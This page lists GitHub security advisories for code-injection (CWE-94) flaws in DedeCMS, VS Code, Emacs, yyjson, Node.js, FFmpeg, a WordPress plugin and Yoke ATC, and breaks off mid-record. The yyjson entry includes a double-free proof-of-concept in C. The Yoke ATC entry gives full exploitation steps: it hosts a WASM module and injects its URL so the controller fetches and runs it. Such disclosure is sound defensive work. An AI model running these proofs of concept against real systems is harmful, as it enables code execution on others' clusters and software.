CWE-94
Allowed-with-ReviewImproper Control of Generation of Code ('Code Injection')
Abstraction: Base · Status: Draft
The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.
8287 vulnerabilities reference this CWE, most recent first.
GHSA-WHV6-J2G7-VCQ4
Vulnerability from github – Published: 2022-08-18 00:00 – Updated: 2022-08-20 00:00DedeCMS v5.7.94 - v5.7.97 was discovered to contain a remote code execution vulnerability in member_toadmin.php.
{
"affected": [],
"aliases": [
"CVE-2022-36216"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-08-17T20:15:00Z",
"severity": "HIGH"
},
"details": "DedeCMS v5.7.94 - v5.7.97 was discovered to contain a remote code execution vulnerability in member_toadmin.php.",
"id": "GHSA-whv6-j2g7-vcq4",
"modified": "2022-08-20T00:00:57Z",
"published": "2022-08-18T00:00:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-36216"
},
{
"type": "WEB",
"url": "https://github.com/whitehatl/Vulnerability/blob/main/web/dedecms/5.7.94/member_toadmin.poc.md"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-WHW4-3P4X-P8FW
Vulnerability from github – Published: 2021-12-16 00:01 – Updated: 2022-07-13 00:01Visual Studio Code Remote Code Execution Vulnerability
{
"affected": [],
"aliases": [
"CVE-2021-43891"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-12-15T15:15:00Z",
"severity": "HIGH"
},
"details": "Visual Studio Code Remote Code Execution Vulnerability",
"id": "GHSA-whw4-3p4x-p8fw",
"modified": "2022-07-13T00:01:49Z",
"published": "2021-12-16T00:01:43Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-43891"
},
{
"type": "WEB",
"url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43891"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-WHWP-M746-HX6W
Vulnerability from github – Published: 2023-03-09 06:30 – Updated: 2025-03-05 18:32emacsclient-mail.desktop in Emacs 28.1 through 28.2 is vulnerable to Emacs Lisp code injections through a crafted mailto: URI with unescaped double-quote characters.
{
"affected": [],
"aliases": [
"CVE-2023-27986"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-03-09T06:15:00Z",
"severity": "CRITICAL"
},
"details": "emacsclient-mail.desktop in Emacs 28.1 through 28.2 is vulnerable to Emacs Lisp code injections through a crafted mailto: URI with unescaped double-quote characters.",
"id": "GHSA-whwp-m746-hx6w",
"modified": "2025-03-05T18:32:02Z",
"published": "2023-03-09T06:30:21Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-27986"
},
{
"type": "WEB",
"url": "https://www.gabriel.urdhr.fr/2023/06/08/emacsclient-mail-shell-elisp-injections"
},
{
"type": "WEB",
"url": "https://www.openwall.com/lists/oss-security/2023/03/08/2"
},
{
"type": "WEB",
"url": "http://git.savannah.gnu.org/cgit/emacs.git/commit/?h=emacs-29\u0026id=3c1693d08b0a71d40a77e7b40c0ebc42dca2d2cc"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2023/03/09/1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-WHX6-M9J4-W2M2
Vulnerability from github – Published: 2024-02-29 03:33 – Updated: 2025-11-05 00:31Summary
The pool series allocator (pool_malloc/pool_free/pool_realloc) by yysjon has a Double Free vulnerability, which may lead to arbitrary address writing and Denial of Service (DoS) attacks. Arbitrary address writing, combined with other legitimate or illegitimate operations of programs using this library, can lead to remote code execution.
Details
The core cause of this vulnerability lies in the pool_free function's lack of loop checks, while the direct cause stems from the pool_free function and similar free-series functions not performing pointer destruction, resulting in Use-After-Free (UAF) vulnerabilities.
PoC
Below, a C language program using yyjson 0.8.0 is written to show how to exploit a Double Free vulnerability to cause chunk overlaps, which then allows the modification of a chunk's next pointer to point to an arbitrary address. If the targeted address is valid, modifications can be made. However, if the address is invalid, it could lead to the program crashing, which could be exploited for a Denial of Service (DoS) attack. Additionally, constructing a cyclic chain of chunks could force the service into an infinite loop, also exploitable for a DoS attack.
#include <stdio.h>
#include "yyjson.h"
char test[0x110];
int64_t a=0xffffffff;
int64_t b= (int64_t) test;
int main() {
size_t max_json_size = 64 * 1024;
size_t buf_size = yyjson_read_max_memory_usage(max_json_size, 0);
void *buf = malloc(buf_size);
yyjson_alc alc;
yyjson_alc_pool_init(&alc, buf, buf_size);
yyjson_mut_doc *p1 = yyjson_mut_doc_new(&alc);
yyjson_mut_doc *p2 = yyjson_mut_doc_new(&alc);
yyjson_mut_arr(p2);
yyjson_mut_doc *p3 = yyjson_mut_doc_new(&alc);
yyjson_mut_doc_free(p2);
yyjson_mut_doc_free(p2); // double free
yyjson_mut_doc_free(p1);
yyjson_read_flag flg = YYJSON_READ_ALLOW_COMMENTS | YYJSON_READ_ALLOW_INF_AND_NAN;
for(int i=0;i<0x100;i++)test[i]= 'a';
test[0x100]='\00';
char *payload_f = "[%lld,43981]";
char payload[100];
sprintf(payload,payload_f,&a);
yyjson_mut_doc *p4 = yyjson_read_opts(payload,strlen(payload),flg,&alc,NULL);
yyjson_mut_doc *p5 = yyjson_mut_doc_new(&alc);
yyjson_mut_doc *p6 = yyjson_mut_doc_new(&alc);
yyjson_mut_doc *p7 = yyjson_mut_doc_new(&alc);
yyjson_mut_doc *p8 = yyjson_mut_doc_new(&alc);
for(int z=1;z<=100;z++)
yyjson_mut_int(p8,0x63636363);
printf("%s",test);
free(buf);
return 0;
}
Impact
What kind of vulnerability is it? Who is impacted?
Note from yyjson
yyjson_mut_doc_free() is well-documented: https://github.com/ibireme/yyjson/blob/0.8.0/src/yyjson.h#L2090-L2093
/** Release the JSON document and free the memory.
After calling this function, the `doc` and all values from the `doc` are no
longer available. This function will do nothing if the `doc` is NULL. */
void yyjson_mut_doc_free(yyjson_doc *doc);
If you have already called yyjson_mut_doc_free() on a doc, the doc and its internal values are invalid. Any further operation on the doc or its values is undefined behavior.
While this is not a bug in yyjson itself, a defensive patch has been provided: 0eca326 If you mistakenly call yyjson_mut_doc_free() twice on the same doc against the documentation, this patch will cause your program to crash immediately, alerting you to the incorrect usage.
{
"affected": [
{
"package": {
"ecosystem": "SwiftURL",
"name": "github.com/ibireme/yyjson"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.9.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-25713"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2024-08-29T18:04:24Z",
"nvd_published_at": "2024-02-29T01:44:16Z",
"severity": "HIGH"
},
"details": "### Summary\n\nThe pool series allocator (pool_malloc/pool_free/pool_realloc) by yysjon has a Double Free vulnerability, which may lead to arbitrary address writing and Denial of Service (DoS) attacks.\nArbitrary address writing, combined with other legitimate or illegitimate operations of programs using this library, can lead to remote code execution.\n\n### Details\n\nThe core cause of this vulnerability lies in the pool_free function\u0027s lack of loop checks, while the direct cause stems from the pool_free function and similar free-series functions not performing pointer destruction, resulting in Use-After-Free (UAF) vulnerabilities.\n\n### PoC\n\nBelow, a C language program using yyjson 0.8.0 is written to show how to exploit a Double Free vulnerability to cause chunk overlaps, which then allows the modification of a chunk\u0027s next pointer to point to an arbitrary address. If the targeted address is valid, modifications can be made. However, if the address is invalid, it could lead to the program crashing, which could be exploited for a Denial of Service (DoS) attack. Additionally, constructing a cyclic chain of chunks could force the service into an infinite loop, also exploitable for a DoS attack.\n\n```\n#include \u003cstdio.h\u003e\n#include \"yyjson.h\"\n\nchar test[0x110];\nint64_t a=0xffffffff;\nint64_t b= (int64_t) test;\n\nint main() {\n\n size_t max_json_size = 64 * 1024;\n\n size_t buf_size = yyjson_read_max_memory_usage(max_json_size, 0);\n\n void *buf = malloc(buf_size);\n\n yyjson_alc alc;\n yyjson_alc_pool_init(\u0026alc, buf, buf_size);\n\n yyjson_mut_doc *p1 = yyjson_mut_doc_new(\u0026alc);\n yyjson_mut_doc *p2 = yyjson_mut_doc_new(\u0026alc);\n yyjson_mut_arr(p2);\n\n yyjson_mut_doc *p3 = yyjson_mut_doc_new(\u0026alc);\n\n yyjson_mut_doc_free(p2);\n yyjson_mut_doc_free(p2); // double free\n yyjson_mut_doc_free(p1);\n\n yyjson_read_flag flg = YYJSON_READ_ALLOW_COMMENTS | YYJSON_READ_ALLOW_INF_AND_NAN;\n\n\n for(int i=0;i\u003c0x100;i++)test[i]= \u0027a\u0027;\n test[0x100]=\u0027\\00\u0027;\n char *payload_f = \"[%lld,43981]\";\n\n char payload[100];\n sprintf(payload,payload_f,\u0026a);\n yyjson_mut_doc *p4 = yyjson_read_opts(payload,strlen(payload),flg,\u0026alc,NULL);\n\n yyjson_mut_doc *p5 = yyjson_mut_doc_new(\u0026alc);\n yyjson_mut_doc *p6 = yyjson_mut_doc_new(\u0026alc);\n yyjson_mut_doc *p7 = yyjson_mut_doc_new(\u0026alc);\n yyjson_mut_doc *p8 = yyjson_mut_doc_new(\u0026alc);\n for(int z=1;z\u003c=100;z++)\n yyjson_mut_int(p8,0x63636363);\n\n printf(\"%s\",test);\n free(buf);\n return 0;\n}\n```\n\n### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\n## Note from yyjson\nyyjson_mut_doc_free() is well-documented:\nhttps://github.com/ibireme/yyjson/blob/0.8.0/src/yyjson.h#L2090-L2093\n\n```\n/** Release the JSON document and free the memory.\n After calling this function, the `doc` and all values from the `doc` are no\n longer available. This function will do nothing if the `doc` is NULL. */\nvoid yyjson_mut_doc_free(yyjson_doc *doc);\n```\nIf you have already called yyjson_mut_doc_free() on a doc, the doc and its internal values are invalid.\nAny further operation on the doc or its values is undefined behavior.\n\nWhile this is not a bug in yyjson itself, a defensive patch has been provided: [0eca326](https://github.com/ibireme/yyjson/commit/0eca326fe57aeeb866e6f04c9ef9ea9f8343157e)\nIf you mistakenly call yyjson_mut_doc_free() twice on the same doc against the documentation,\nthis patch will cause your program to crash immediately, alerting you to the incorrect usage.",
"id": "GHSA-whx6-m9j4-w2m2",
"modified": "2025-11-05T00:31:17Z",
"published": "2024-02-29T03:33:18Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/ibireme/yyjson/security/advisories/GHSA-q4m7-9pcm-fpxh"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25713"
},
{
"type": "WEB",
"url": "https://github.com/ibireme/yyjson/commit/0eca326fe57aeeb866e6f04c9ef9ea9f8343157e"
},
{
"type": "PACKAGE",
"url": "https://github.com/ibireme/yyjson"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6KQ67T4R7QEWURW5NMCCVLTBASL4ECHE"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NNICQVIF7BRYFWYRL3HPVAJIPXN4OVTX"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TKQPEREDUDKGYJMFNFDQVYCVLWDRO2Y2"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6KQ67T4R7QEWURW5NMCCVLTBASL4ECHE"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NNICQVIF7BRYFWYRL3HPVAJIPXN4OVTX"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TKQPEREDUDKGYJMFNFDQVYCVLWDRO2Y2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "yyjson has a Double Free vulnerability"
}
GHSA-WJ24-GWH6-MGH8
Vulnerability from github – Published: 2024-09-07 18:30 – Updated: 2025-11-04 00:31Maliciously crafted export names in an imported WebAssembly module can inject JavaScript code. The injected code may be able to access data and functions that the WebAssembly module itself does not have access to, similar to as if the WebAssembly module was a JavaScript module.
This vulnerability affects users of any active release line of Node.js. The vulnerable feature is only available if Node.js is started with the --experimental-wasm-modules command line option.
{
"affected": [],
"aliases": [
"CVE-2023-39333"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-09-07T16:15:02Z",
"severity": "MODERATE"
},
"details": "Maliciously crafted export names in an imported WebAssembly module can inject JavaScript code. The injected code may be able to access data and functions that the WebAssembly module itself does not have access to, similar to as if the WebAssembly module was a JavaScript module.\n\nThis vulnerability affects users of any active release line of Node.js. The vulnerable feature is only available if Node.js is started with the `--experimental-wasm-modules` command line option.",
"id": "GHSA-wj24-gwh6-mgh8",
"modified": "2025-11-04T00:31:23Z",
"published": "2024-09-07T18:30:23Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39333"
},
{
"type": "WEB",
"url": "https://nodejs.org/en/blog/vulnerability/october-2023-security-releases"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20240808-0004"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20241004-0006"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20241108-0002"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-WJ4Q-GPCG-GVVM
Vulnerability from github – Published: 2025-11-06 18:32 – Updated: 2026-01-20 15:31Improper Control of Generation of Code ('Code Injection') vulnerability in VillaTheme HAPPY happy-helpdesk-support-ticket-system allows Remote Code Inclusion.This issue affects HAPPY: from n/a through <= 1.0.7.
{
"affected": [],
"aliases": [
"CVE-2025-49372"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-11-06T16:15:52Z",
"severity": "CRITICAL"
},
"details": "Improper Control of Generation of Code (\u0027Code Injection\u0027) vulnerability in VillaTheme HAPPY happy-helpdesk-support-ticket-system allows Remote Code Inclusion.This issue affects HAPPY: from n/a through \u003c= 1.0.7.",
"id": "GHSA-wj4q-gpcg-gvvm",
"modified": "2026-01-20T15:31:47Z",
"published": "2025-11-06T18:32:52Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-49372"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/Wordpress/Plugin/happy-helpdesk-support-ticket-system/vulnerability/wordpress-happy-plugin-1-0-7-remote-code-execution-rce-vulnerability?_s_id=cve"
},
{
"type": "WEB",
"url": "https://vdp.patchstack.com/database/Wordpress/Plugin/happy-helpdesk-support-ticket-system/vulnerability/wordpress-happy-plugin-1-0-7-remote-code-execution-rce-vulnerability"
},
{
"type": "WEB",
"url": "https://vdp.patchstack.com/database/Wordpress/Plugin/happy-helpdesk-support-ticket-system/vulnerability/wordpress-happy-plugin-1-0-7-remote-code-execution-rce-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-WJ7R-CV36-MXR3
Vulnerability from github – Published: 2025-01-06 18:31 – Updated: 2025-11-03 21:32A flaw was found in FFmpeg's HLS demuxer. This vulnerability allows bypassing unsafe file extension checks and triggering arbitrary demuxers via base64-encoded data URIs appended with specific file extensions.
{
"affected": [],
"aliases": [
"CVE-2023-6601"
],
"database_specific": {
"cwe_ids": [
"CWE-94",
"CWE-99"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-01-06T17:15:14Z",
"severity": "MODERATE"
},
"details": "A flaw was found in FFmpeg\u0027s HLS demuxer. This vulnerability allows bypassing unsafe file extension checks and triggering arbitrary demuxers via base64-encoded data URIs appended with specific file extensions.",
"id": "GHSA-wj7r-cv36-mxr3",
"modified": "2025-11-03T21:32:03Z",
"published": "2025-01-06T18:31:03Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6601"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2253172"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/07/msg00004.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-WJ8P-JJ64-H7FF
Vulnerability from github – Published: 2026-02-12 22:06 – Updated: 2026-02-13 17:15Arbitrary WASM Code Execution via AnnotationOverrideFlight Injection in Yoke ATC
This vulnerability exists in the Air Traffic Controller (ATC) component of Yoke, a Kubernetes deployment tool. It allows users with CR create/update permissions to execute arbitrary WASM code in the ATC controller context by injecting a malicious URL through the overrides.yoke.cd/flight annotation. The ATC controller downloads and executes the WASM module without proper URL validation, enabling attackers to create arbitrary Kubernetes resources or potentially escalate privileges to cluster-admin level.
Recommended CWE: CWE-94 (Improper Control of Generation of Code - Code Injection)
Summary
Yoke ATC allows users to override the Flight WASM module URL via the overrides.yoke.cd/flight annotation on Custom Resources. The controller only checks if the user has update permission on airways resources but does not validate the WASM URL source. An attacker with CR create/update permissions can inject a malicious WASM URL, causing the ATC controller to download and execute arbitrary code.
Details
The vulnerability exists in two code paths:
Source Point - Annotation Definition (pkg/flight/flight.go:41-42):
const (
AnnotationOverrideFlight = "overrides.yoke.cd/flight"
AnnotationOverrideMode = "overrides.yoke.cd/mode"
)
Sink Point 1 - Admission Webhook (cmd/atc/handler.go:298-300):
if overrideURL, _, _ := unstructured.NestedString(cr.Object, "metadata", "annotations", flight.AnnotationOverrideFlight); overrideURL != "" {
xhttp.AddRequestAttrs(r.Context(), slog.Group("overrides", "flight", overrideURL))
takeoffParams.Flight.Path = overrideURL // User-provided URL used directly
}
Sink Point 2 - Reconciler (internal/atc/reconciler_instance.go:264-269):
if overrideURL, _, _ := unstructured.NestedString(resource.Object, "metadata", "annotations", flight.AnnotationOverrideFlight); overrideURL != "" {
ctrl.Logger(ctx).Warn("using override module", "url", overrideURL)
// Simply set the override URL as the flight path and let yoke load and execute the wasm module
takeoffParams.Flight.Path = overrideURL // User-provided URL used directly without validation
}
The permission check at cmd/atc/handler.go:160-177 only verifies update permission on airways resources, not the ability to execute arbitrary WASM code:
accessReview, err := params.Client.Clientset.AuthorizationV1().SubjectAccessReviews().Create(
r.Context(),
&authorizationv1.SubjectAccessReview{
Spec: authorizationv1.SubjectAccessReviewSpec{
ResourceAttributes: &authorizationv1.ResourceAttributes{
Verb: "update",
Group: "yoke.cd",
Version: "v1alpha1",
Resource: "airways", // Only checks airway update permission
},
},
},
)
PoC
Environment Setup
Prerequisites: - Docker installed and running - kubectl installed - Go 1.21+ installed - kind installed
Step 1: Create Kind cluster
cat > /tmp/kind-config.yaml << 'EOF'
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
name: yoke-vuln-test
nodes:
- role: control-plane
EOF
kind create cluster --config /tmp/kind-config.yaml
Step 2: Build and install Yoke CLI
# Clone yoke repository
git clone https://github.com/yokecd/yoke.git
cd yoke
# Build yoke CLI (patch version if needed for compatibility)
GOPROXY=direct GOSUMDB=off go build -o /tmp/yoke ./cmd/yoke
# Verify installation
/tmp/yoke version
Expected output:
╭───────────────────────────────┬──────────╮
│ yoke │ v0.18.0 │
│ toolchain │ go1.25.6 │
│ k8s.io/client-go │ v0.34.1 │
│ github.com/tetratelabs/wazero │ v1.6.0 │
╰───────────────────────────────┴──────────╯
Step 3: Deploy ATC
/tmp/yoke takeoff --create-namespace --namespace atc -wait 120s atc oci://ghcr.io/yokecd/atc-installer:latest
Expected output:
Cluster-access not granted: enable cluster-access to reuse existing TLS certificates.
Generating TLS certificates, this may take a second...
Finished generating TLS certificates.
---
successful takeoff of atc
Step 4: Verify ATC deployment and permissions
kubectl get pods -n atc
kubectl get clusterrolebinding | grep atc
Expected output:
NAME READY STATUS RESTARTS AGE
atc-atc-6d4bcb7665-wvqkt 1/1 Running 0 22s
atc-atc-cluster-role-binding ClusterRole/cluster-admin 22s
Step 5: Deploy Backend Airway example
/tmp/yoke takeoff -wait 60s backendairway "https://github.com/yokecd/examples/releases/download/latest/atc_backend_airway.wasm.gz"
Expected output:
successful takeoff of backendairway
Exploitation Steps
Step 1: Create malicious WASM module
Create malicious-wasm.go:
// Malicious WASM module for VUL-001 vulnerability verification
package main
import (
"encoding/json"
"fmt"
)
func main() {
// Create a ConfigMap to prove arbitrary code execution
resource := map[string]interface{}{
"apiVersion": "v1",
"kind": "ConfigMap",
"metadata": map[string]interface{}{
"name": "stolen-credentials",
"namespace": "default",
"labels": map[string]string{
"vulnerability": "VUL-001",
"type": "exfiltrated-token",
},
},
"data": map[string]string{
"vulnerability": "VUL-001: AnnotationOverrideFlight Injection allows arbitrary WASM execution",
"proof": "This ConfigMap was created by malicious WASM code",
},
}
resources := []interface{}{resource}
output, _ := json.Marshal(resources)
fmt.Println(string(output))
}
Compile to WASM:
GOOS=wasip1 GOARCH=wasm go build -o malicious.wasm ./malicious-wasm.go
Step 2: Host malicious WASM
python3 -m http.server 8888 &
Step 3: Get host IP accessible from Kind cluster
HOST_IP=$(ip addr show docker0 | grep 'inet ' | awk '{print $2}' | cut -d/ -f1)
echo "Malicious WASM URL: http://${HOST_IP}:8888/malicious.wasm"
Step 4: Create malicious Backend CR
MALICIOUS_URL="http://${HOST_IP}:8888/malicious.wasm"
kubectl apply -f - <<EOF
apiVersion: examples.com/v1
kind: Backend
metadata:
name: malicious-backend
namespace: default
annotations:
overrides.yoke.cd/flight: "${MALICIOUS_URL}"
spec:
image: nginx:latest
replicas: 1
EOF
Expected output:
backend.examples.com/malicious-backend created
Step 5: Verify exploitation
Check ATC logs:
kubectl logs -n atc deployment/atc-atc | grep -i "override\|malicious"
Actual log output from verification:
{"time":"2026-02-01T13:58:30.4998068Z","level":"INFO","msg":"request served","component":"server","code":200,"method":"POST","path":"/validations/backends.examples.com","elapsed":"375ms","overrides":{"flight":"http://172.17.0.1:8888/malicious.wasm"},"validation":{"allowed":true,"status":""}}
{"time":"2026-02-01T13:56:33.826710613Z","level":"WARN","msg":"using override module","component":"controller","url":"http://172.17.0.1:8888/malicious.wasm"}
Check HTTP server logs (shows WASM download):
172.18.0.2 - - [01/Feb/2026 21:55:58] "GET /malicious.wasm HTTP/1.1" 200 -
172.18.0.2 - - [01/Feb/2026 21:56:32] "GET /malicious.wasm HTTP/1.1" 200 -
172.18.0.2 - - [01/Feb/2026 21:56:33] "GET /malicious.wasm HTTP/1.1" 200 -
Check created ConfigMap:
kubectl get configmap stolen-credentials -n default -o yaml
Actual output from verification:
apiVersion: v1
kind: ConfigMap
metadata:
name: stolen-credentials
namespace: default
labels:
vulnerability: VUL-001
type: exfiltrated-token
app.kubernetes.io/managed-by: atc.yoke
instance.atc.yoke.cd/name: malicious-backend-v2
data:
vulnerability: 'VUL-001: AnnotationOverrideFlight Injection allows arbitrary WASM execution'
Expected Result
The malicious WASM module is downloaded and executed by the ATC controller, creating a ConfigMap named stolen-credentials in the cluster. This proves arbitrary code execution in the ATC controller context.
Impact
Vulnerability Type: Remote Code Execution (RCE) / Code Injection
Attack Prerequisites: - Attacker has permission to create/update Custom Resources managed by Yoke ATC - Network access to host malicious WASM (can be external URL)
Impact Assessment: - Confidentiality: High - Attacker can create resources to exfiltrate data; if ClusterAccess is enabled, can read cluster secrets via host functions - Integrity: High - Attacker can create/modify arbitrary Kubernetes resources through WASM output - Availability: Medium - Attacker can disrupt cluster operations by creating malicious resources
Attack Scenario: 1. CI/CD developer or application developer with CR permissions creates a Backend CR with malicious annotation 2. ATC controller downloads and executes attacker-controlled WASM 3. Malicious WASM creates backdoor resources or exfiltrates sensitive data 4. If ClusterAccess is enabled, attacker can read secrets and escalate to cluster-admin
Severity
CVSS v3.1 Score: 8.8 (High)
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- Attack Vector (AV): Network - Malicious WASM can be hosted externally
- Attack Complexity (AC): Low - Simple annotation injection
- Privileges Required (PR): Low - Only CR create/update permission needed
- User Interaction (UI): None - Automatic execution on CR creation
- Scope (S): Unchanged - Impact within ATC controller context
- Confidentiality (C): High - Can access controller context data
- Integrity (I): High - Can create arbitrary resources
- Availability (A): High - Can disrupt cluster operations
Affected Versions
- Yoke ATC v0.18.x and earlier versions
- All versions that support the
overrides.yoke.cd/flightannotation
Patched Versions
No patch available at time of disclosure.
Workarounds
-
Disable annotation override feature: Remove or disable the
overrides.yoke.cd/flightannotation processing in production environments -
Network policy: Restrict ATC controller's outbound network access to prevent downloading external WASM modules
-
RBAC hardening: Limit CR create/update permissions to trusted users only
-
Admission webhook: Deploy a validating webhook to reject CRs with
overrides.yoke.cd/flightannotations
References
- Yoke Project: https://github.com/yokecd/yoke
- Yoke ATC Documentation: https://yokecd.github.io/docs/airtrafficcontroller/atc/
- CWE-94: Improper Control of Generation of Code: https://cwe.mitre.org/data/definitions/94.html
Credits
credit for: @b0b0haha (603571786@qq.com) @lixingquzhi (mayedoushidalao@163.com)
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/yokecd/yoke"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.19.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-26056"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-12T22:06:45Z",
"nvd_published_at": "2026-02-12T22:16:06Z",
"severity": "HIGH"
},
"details": "# Arbitrary WASM Code Execution via AnnotationOverrideFlight Injection in Yoke ATC\n\nThis vulnerability exists in the Air Traffic Controller (ATC) component of Yoke, a Kubernetes deployment tool. It allows users with CR create/update permissions to execute arbitrary WASM code in the ATC controller context by injecting a malicious URL through the `overrides.yoke.cd/flight` annotation. The ATC controller downloads and executes the WASM module without proper URL validation, enabling attackers to create arbitrary Kubernetes resources or potentially escalate privileges to cluster-admin level.\n\n**Recommended CWE**: CWE-94 (Improper Control of Generation of Code - Code Injection)\n\n## Summary\n\nYoke ATC allows users to override the Flight WASM module URL via the `overrides.yoke.cd/flight` annotation on Custom Resources. The controller only checks if the user has `update` permission on `airways` resources but does not validate the WASM URL source. An attacker with CR create/update permissions can inject a malicious WASM URL, causing the ATC controller to download and execute arbitrary code.\n\n## Details\n\nThe vulnerability exists in two code paths:\n\n**Source Point - Annotation Definition** (`pkg/flight/flight.go:41-42`):\n```go\nconst (\n AnnotationOverrideFlight = \"overrides.yoke.cd/flight\"\n AnnotationOverrideMode = \"overrides.yoke.cd/mode\"\n)\n```\n\n**Sink Point 1 - Admission Webhook** (`cmd/atc/handler.go:298-300`):\n```go\nif overrideURL, _, _ := unstructured.NestedString(cr.Object, \"metadata\", \"annotations\", flight.AnnotationOverrideFlight); overrideURL != \"\" {\n xhttp.AddRequestAttrs(r.Context(), slog.Group(\"overrides\", \"flight\", overrideURL))\n takeoffParams.Flight.Path = overrideURL // User-provided URL used directly\n}\n```\n\n**Sink Point 2 - Reconciler** (`internal/atc/reconciler_instance.go:264-269`):\n```go\nif overrideURL, _, _ := unstructured.NestedString(resource.Object, \"metadata\", \"annotations\", flight.AnnotationOverrideFlight); overrideURL != \"\" {\n ctrl.Logger(ctx).Warn(\"using override module\", \"url\", overrideURL)\n // Simply set the override URL as the flight path and let yoke load and execute the wasm module\n takeoffParams.Flight.Path = overrideURL // User-provided URL used directly without validation\n}\n```\n\nThe permission check at `cmd/atc/handler.go:160-177` only verifies `update` permission on `airways` resources, not the ability to execute arbitrary WASM code:\n```go\naccessReview, err := params.Client.Clientset.AuthorizationV1().SubjectAccessReviews().Create(\n r.Context(),\n \u0026authorizationv1.SubjectAccessReview{\n Spec: authorizationv1.SubjectAccessReviewSpec{\n ResourceAttributes: \u0026authorizationv1.ResourceAttributes{\n Verb: \"update\",\n Group: \"yoke.cd\",\n Version: \"v1alpha1\",\n Resource: \"airways\", // Only checks airway update permission\n },\n },\n },\n)\n```\n\n## PoC\n\n### Environment Setup\n\n**Prerequisites**:\n- Docker installed and running\n- kubectl installed\n- Go 1.21+ installed\n- kind installed\n\n**Step 1: Create Kind cluster**\n```bash\ncat \u003e /tmp/kind-config.yaml \u003c\u003c \u0027EOF\u0027\nkind: Cluster\napiVersion: kind.x-k8s.io/v1alpha4\nname: yoke-vuln-test\nnodes:\n- role: control-plane\nEOF\n\nkind create cluster --config 